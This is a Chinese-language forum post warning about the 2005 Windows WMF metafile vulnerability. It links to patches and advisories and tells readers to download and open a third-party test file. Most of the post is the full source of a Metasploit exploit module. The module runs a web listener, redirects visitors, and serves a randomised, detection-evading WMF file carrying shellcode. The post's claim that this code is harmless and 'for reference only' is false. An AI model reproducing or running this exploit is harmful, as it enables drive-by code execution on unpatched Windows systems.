最新微軟病毒， 請注意！！！！！

[B]微軟對此已漏洞於北美中部時間1/5/2005下午4:30分左右發布最新補丁, 請速下載:
http://windowsupdate.microsoft.com [/B][/SIZE][/COLOR]


[B]微軟設定於下周二發布最新補丁，在此之前請小心打開任何不可信的圖像！！詳情如下[/SIZE][/B][/COLOR]

中文：
http://antivirus.hinet.net/secureinfo/popup.php?cert_id=HiNet-2005-0189
http://www.gsn-cert.nat.gov.tw/gsn.php?chtip=HiNet-2006-0001

英文：
http://www.microsoft.com/technet/security/advisory/912840.mspx
http://www.eweek.com/article2/0,1895,1906177,00.asp


被侵犯的計算機會類似於這些照片:
注意背景被更換，安全中心被關閉, 而且會跳出窗口讓用戶填寫信用卡信息！[/COLOR][/SIZE]





[B]測試你的系統是否會中毒!!!

右鍵單擊, 下載下面文件, 雙擊下載后的文件. 你會發現"Calc.exe"被打開, 然後跳出Explorer錯誤"Run DLL as an App".  

如果有上述情況, 你的電腦就有中毒可能.

剛果本人已經測試過, 除測試系統是否會中毒外不會對系統有負面影響.

[/COLOR][/B][/SIZE]

http://sipr.net/test.wmf


[B]
解決方式:
1. BackChina主頁所提到的避免方式已經不能緩解最新版的病毒/惡意軟體
2. 暫時最新和最完全的解除方式, 下載並安裝下面任何一個exe文件, 等待微軟發布正式補丁時再用程序卸載中心卸載此軟體
[/COLOR][/B][/SIZE]

http://www.grc.com/miscfiles/wmffix_hexblog14.exe
http://handlers.sans.org/tliston/wmffix_hexblog14.exe
http://castlecops.com/modules.ph ... p=getit&lid=496

[B]法國安全事件反應團(FrSIRT)發布惡意漏洞源碼：(本碼並不能帶來危害，只供參考）[/B][/COLOR][/SIZE]

1. ##
   
2. # This file is part of the Metasploit Framework and may be redistributed
   
3. # according to the licenses defined in the Authors field below. In the
   
4. # case of an unknown or missing license, this file defaults to the same
   
5. # license as the core Framework (dual GPLv2 and Artistic). The latest
   
6. # version of the Framework can always be obtained from metasploit.com.
   
7. ##
   
8. 
   
9. package Msf::Exploit::ie_xp_pfv_metafile;
   
10. 
    
11. use strict;
    
12. use base "Msf::Exploit";
    
13. use Pex::Text;
    
14. use IO::Socket::INET;
    
15. 
    
16. my $advanced =
    
17. {
    
18. };
    
19. 
    
20. my $info =
    
21. {
    
22. 'Name' => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution',
    
23. 'Version' => '$Revision: 1.9 $',
    
24. 'Authors' =>
    
25. [
    
26. 'H D Moore <hdm [at] metasploit.com',
    
27. 'san <san [at] xfocus.org>',
    
28. 'O600KO78RUS[at]unknown.ru'
    
29. ],
    
30. 
    
31. 'Description' =>
    
32. Pex::Text::Freeform(qq{
    
33. This module exploits a vulnerability in the GDI library included with
    
34. Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
    
35. to execute arbitrary code through the SetAbortProc procedure. This module
    
36. generates a random WMF record stream for each request.
    
37. }),
    
38. 
    
39. 'Arch' => [ 'x86' ],
    
40. 'OS' => [ 'win32', 'winxp', 'win2003' ],
    
41. 'Priv' => 0,
    
42. 
    
43. 'UserOpts' =>
    
44. {
    
45. 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
    
46. 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
    
47. },
    
48. 
    
49. 'Payload' =>
    
50. {
    
51. 'Space' => 1000 + int(rand(256)) * 4,
    
52. 'BadChars' => "\x00",
    
53. 'Keys' => ['-bind'],
    
54. },
    
55. 'Refs' =>
    
56. [
    
57. ['BID', '16074'],
    
58. ['CVE', '2005-4560'],
    
59. ['OSVDB', '21987'],
    
60. ['MIL', '111'],
    
61. ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
    
62. ['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
    
63. ],
    
64. 
    
65. 'DefaultTarget' => 0,
    
66. 'Targets' =>
    
67. [
    
68. [ 'Automatic - Windows XP / Windows 2003' ]
    
69. ],
    
70. 
    
71. 'Keys' => [ 'wmf' ],
    
72. 
    
73. 'DisclosureDate' => 'Dec 27 2005',
    
74. };
    
75. 
    
76. sub new {
    
77. my $class = shift;
    
78. my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    
79. return($self);
    
80. }
    
81. 
    
82. sub Exploit
    
83. {
    
84. my $self = shift;
    
85. my $server = IO::Socket::INET->new(
    
86. LocalHost => $self->GetVar('HTTPHOST'),
    
87. LocalPort => $self->GetVar('HTTPPORT'),
    
88. ReuseAddr => 1,
    
89. Listen => 1,
    
90. Proto => 'tcp'
    
91. );
    
92. my $client;
    
93. 
    
94. # Did the listener create fail?
    
95. if (not defined($server)) {
    
96. $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
    
97. return;
    
98. }
    
99. 
    
100. my $httphost = $self->GetVar('HTTPHOST');
     
101. if ($httphost eq '0.0.0.0') {
     
102. $httphost = Pex::Utils::SourceIP('1.2.3.4');
     
103. }
     
104. 
     
105. $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
     
106. 
     
107. while (defined($client = $server->accept())) {
     
108. $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
     
109. }
     
110. 
     
111. return;
     
112. }
     
113. 
     
114. sub HandleHttpClient
     
115. {
     
116. my $self = shift;
     
117. my $fd = shift;
     
118. 
     
119. # Set the remote host information
     
120. my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
     
121. 
     
122. 
     
123. # Read the HTTP command
     
124. my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
     
125. 
     
126. 
     
127. if ($url !~ /\.wmf/i) {
     
128. $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
     
129. 
     
130. # XXX This could be replaced by obfuscated javascript too...
     
131. 
     
132. # Transmit the HTTP redirect response
     
133. $fd->Send(
     
134. "HTTP/1.0 302 Moved\r\n" .
     
135. RandomHeaders().
     
136. "Location: ". RandomPath() .".wmf\r\n" .
     
137. "Content-Type: text/html\r\n" .
     
138. "Content-Length: 0\r\n" .
     
139. "Connection: close\r\n" .
     
140. "\r\n"
     
141. );
     
142. 
     
143. $fd->Close();
     
144. 
     
145. return;
     
146. }
     
147. 
     
148. my $shellcode = $self->GetVar('EncodedPayload')->Payload;
     
149. 
     
150. # Push our minimum length just over the ethernet MTU
     
151. my $pre_mlen = 1440 + rand(8192);
     
152. my $suf_mlen = rand(8192)+128;
     
153. 
     
154. # The number of random objects we generated
     
155. my $fill = 0;
     
156. 
     
157. # The buffer of random bogus objects
     
158. my $pre_buff = "";
     
159. my $suf_buff = "";
     
160. 
     
161. while (length($pre_buff) < $pre_mlen && $fill < 65535) {
     
162. $pre_buff .= RandomWMFRecord();
     
163. $fill += 1;
     
164. }
     
165. 
     
166. while (length($suf_buff) < $suf_mlen && $fill < 65535) {
     
167. $suf_buff .= RandomWMFRecord();
     
168. $fill += 1;
     
169. }
     
170. 
     
171. my $clen = 18 + 8 + 6 + length($shellcode) + length($pre_buff) + length($suf_buff);
     
172. my $content =
     
173. #
     
174. # WindowsMetaHeader
     
175. #
     
176. pack('vvvVvVv',
     
177. # WORD FileType; /* Type of metafile (0=memory, 1=disk, 2=fjear) */
     
178. int(rand(2))+1,
     
179. # WORD HeaderSize; /* Size of header in WORDS (always 9) */
     
180. 9,
     
181. # WORD Version; /* Version of Microsoft Windows used */
     
182. 0x0300,
     
183. # DWORD FileSize; /* Total size of the metafile in WORDs */
     
184. $clen/2,
     
185. # WORD NumOfObjects; /* Number of objects in the file */
     
186. $fill+1,
     
187. # DWORD MaxRecordSize; /* The size of largest record in WORDs */
     
188. int(rand(64)+8),
     
189. # WORD NumOfParams; /* Not Used (always 0) */
     
190. 0
     
191. ).
     
192. #
     
193. # Filler data
     
194. #
     
195. $pre_buff.
     
196. #
     
197. # StandardMetaRecord - Escape()
     
198. #
     
199. pack('Vvv',
     
200. # DWORD Size; /* Total size of the record in WORDs */
     
201. 4,
     
202. # WORD Function; /* Function number (defined in WINDOWS.H) */
     
203. 0x0026, # Can also be 0xff26, 0x0626, etc...
     
204. # WORD Parameters[]; /* Parameter values passed to function */
     
205. 9,
     
206. ). $shellcode .
     
207. #
     
208. # Filler data
     
209. #
     
210. $suf_buff.
     
211. #
     
212. # Complete the structure
     
213. #
     
214. pack('Vv',
     
215. 3,
     
216. 0
     
217. );
     
218. 
     
219. 
     
220. $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)."
     
221. bytes of payload...");
     
222. 
     
223. 
     
224. # Transmit the HTTP response
     
225. my $req =
     
226. "HTTP/1.0 200 OK\r\n" .
     
227. "Content-Type: text/plain\r\n" .
     
228. RandomHeaders().
     
229. "Content-Length: " . length($content) . "\r\n" .
     
230. "Connection: close\r\n" .
     
231. "\r\n" .
     
232. $content;
     
233. 
     
234. 
     
235. my $res = $fd->Send($req);
     
236. 
     
237. # Prevents IE from throwing an error in some cases
     
238. select(undef, undef, undef, 0.1);
     
239. 
     
240. $fd->Close();
     
241. 
     
242. # The Content-Disposition trick was not very reliable (2003 ignores it)
     
243. # "Content-Disposition: inline; filename=". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".jpg\r\n".
     
244. }
     
245. 
     
246. 
     
247. sub RandomWMFRecord {
     
248. my $type = int(rand(3));
     
249. 
     
250. if ($type == 0) {
     
251. # CreatePenIndirect
     
252. return pack('Vv',
     
253. 8,
     
254. 0x02FA
     
255. ). Pex::Text::RandomData(10)
     
256. }
     
257. elsif ( $type == 1 ) {
     
258. # CreateBrushIndirect
     
259. return pack('Vv',
     
260. 7,
     
261. 0x02FC
     
262. ). Pex::Text::RandomData(8)
     
263. }
     
264. else {
     
265. # Rectangle
     
266. return pack('Vv',
     
267. 7,
     
268. 0x041B
     
269. ). Pex::Text::RandomData(8)
     
270. }
     
271. }
     
272. 
     
273. 
     
274. sub RandomHeaders {
     
275. my $self = shift;
     
276. my $head = '';
     
277. 
     
278. while (length($head) < 3072) {
     
279. $head .= "X-" .
     
280. Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
     
281. Pex::Text::AlphaNumText(int(rand(256) + 5)) ."\r\n";
     
282. }
     
283. return $head;
     
284. }
     
285. 
     
286. 
     
287. sub RandomPath {
     
288. my $self = shift;
     
289. my $path = '';
     
290. 
     
291. while (length($path) < 1024) {
     
292. $path .= "/" . Pex::Text::AlphaNumText(int(rand(15) + 5));
     
293. }
     
294. return $path;
     
295. }
     
296. 
     
297. 1;

複製代碼

[B]測試你的系統是否會中毒!!!

右鍵單擊, 下載下面文件, 雙擊下載后的文件. 你會發現"Calc.exe"被打開, 然後跳出Explorer錯誤"Run DLL as an App".  

如果有上述情況, 你的電腦就有中毒可能.

本人已經測試過, 除測試系統是否會中毒外不會對系統有負面影響.

[/COLOR][/B][/SIZE]

http://sipr.net/test.wmf